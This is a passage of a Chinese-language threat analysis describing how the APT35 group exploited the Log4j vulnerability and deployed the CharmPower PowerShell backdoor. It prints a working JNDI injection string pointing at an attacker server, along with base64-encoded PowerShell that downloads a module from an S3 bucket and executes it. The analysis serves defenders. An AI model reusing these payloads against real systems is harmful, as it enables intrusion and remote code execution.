随着Log4j安全漏洞的出现,研究人员已经看到多个攻击者(主要是出于经济动机)立即将其添加到他们的武器库中。毫不奇怪,一些由国家支持的攻击者也将这个新漏洞视为在潜在目标,在受影响系统修复这个漏洞之前寻找发动攻击的机会。
APT35(又名 Charming Kitten、TA453 或 Phosphorus)被怀疑是由伊朗国家支持的黑客组织,在漏洞被披露后仅仅四天,就开始在公开系统中广泛扫描并试图利用Log4j漏洞。攻击者的攻击设置显然是仓促的,因为他们使用了基本的开源工具进行攻击,并基于之前的基础设施进行操作,这使得攻击更容易被检测和识别。
研究人员会在本文中详细介绍APT35利用Log4j漏洞进行最新攻击的细节,并分析了它们被利用后的活动,包括新的基于powershell的模块化框架CharmPower,该框架用于建立持久性、收集信息和执行命令。
感染链
为了利用Log4j漏洞(CVE-2021-44228),攻击者选择了一个公开可用的开源JNDI 漏洞利用工具包,由于该漏洞出现后,该工具包非常受欢迎,因此已从GitHub中删除。有多篇分析论文解释了该漏洞如何被利用,因此研究人员将跳过实际利用步骤的细节。
感染链
为了利用易受攻击的设备,攻击者向受害者的公开资源发送精心制作的请求。在这种情况下,负载是在 User-Agent 或 HTTP Authorization 标头中发送的:
${jndi[:]ldap[://]144[.]217[.]139[.]155:4444/Basic/Command/Base64/cG93ZXJzaGVsbCAtZWMgSkFCWEFHVUFZZ0JEQUd3QWFRQmxBRzRBZEFBOUFFNEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUJ1QUdVQWRBQXVBSGNBWlFCaUFHTUFiQUJwQUdVQWJnQjBBQTBBQ2dBa0FGUUFaUUI0QUhRQUlBQTlBQ0FBSkFCWEFHVUFZZ0JEQUd3QWFRQmxBRzRBZEFBdUFHUUFid0IzQUc0QWJBQnZBR0VBWkFCVEFIUUFjZ0JwQUc0QVp3QW9BQ0lBYUFCMEFIUUFjQUJ6QURvQUx3QXZBSE1BTXdBdUFHRUFiUUJoQUhvQWJ3QnVBR0VBZHdCekFDNEFZd0J2QUcwQUx3QmtBRzhBWXdCc0FHa0FZZ0J5QUdFQWNnQjVBSE1BWVFCc0FHVUFjd0F2QUhRQVpRQnpBSFFBTGdCMEFIZ0FkQUFpQUNrQURRQUtBSEFBYndCM0FHVUFjZ0J6QUdnQVpRQnNBR3dBSUFBdEFHVUFZd0FnQUNRQVZBQmxBSGdBZEFBPQ==}
成功利用后,利用服务器构建并返回一个恶意 Java 类以在易受攻击的设备上执行。这个类使用base64编码的有效负载运行一个PowerShell命令:
ExploitQVQRSQrKet.cmd = "powershell -ec JABXAGUAYgBDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0AA0ACgAkAFQAZQB4AHQAIAA9ACAAJABXAGUAYgBDAGwAaQBlAG4AdAAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAHMAMwAuAGEAbQBhAHoAbwBuAGEAdwBzAC4AYwBvAG0ALwBkAG8AYwBsAGkAYgByAGEAcgB5AHMAYQBsAGUAcwAvAHQAZQBzAHQALgB0AHgAdAAiACkADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAYwAgACQAVABlAHgAdAA=";
它最终从 Amazon S3 存储桶 URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt 下载 PowerShell 模块,然后执行它:
$WebClient=New-Object net.webclient $Text = $WebClient.downloadString("< >") powershell -ec $Text
CharmPower:基于 PowerShell 的模块化后门
下载的 PowerShell 有效负载是主要模块,负责与 C&C 服务器的基本通信以及接收的附加模块的执行。主模块执行以下操作:
验证网络连接:执行后,脚本通过使用参数 hi=hi 向 google.com 发出 HTTP POST 请求来等待活动的互联网连接。
基本系统枚举:该脚本收集 Windows 操作系统版本、计算机名称以及 $APPDATA 路径中的文件 Ni.txt 的内容,该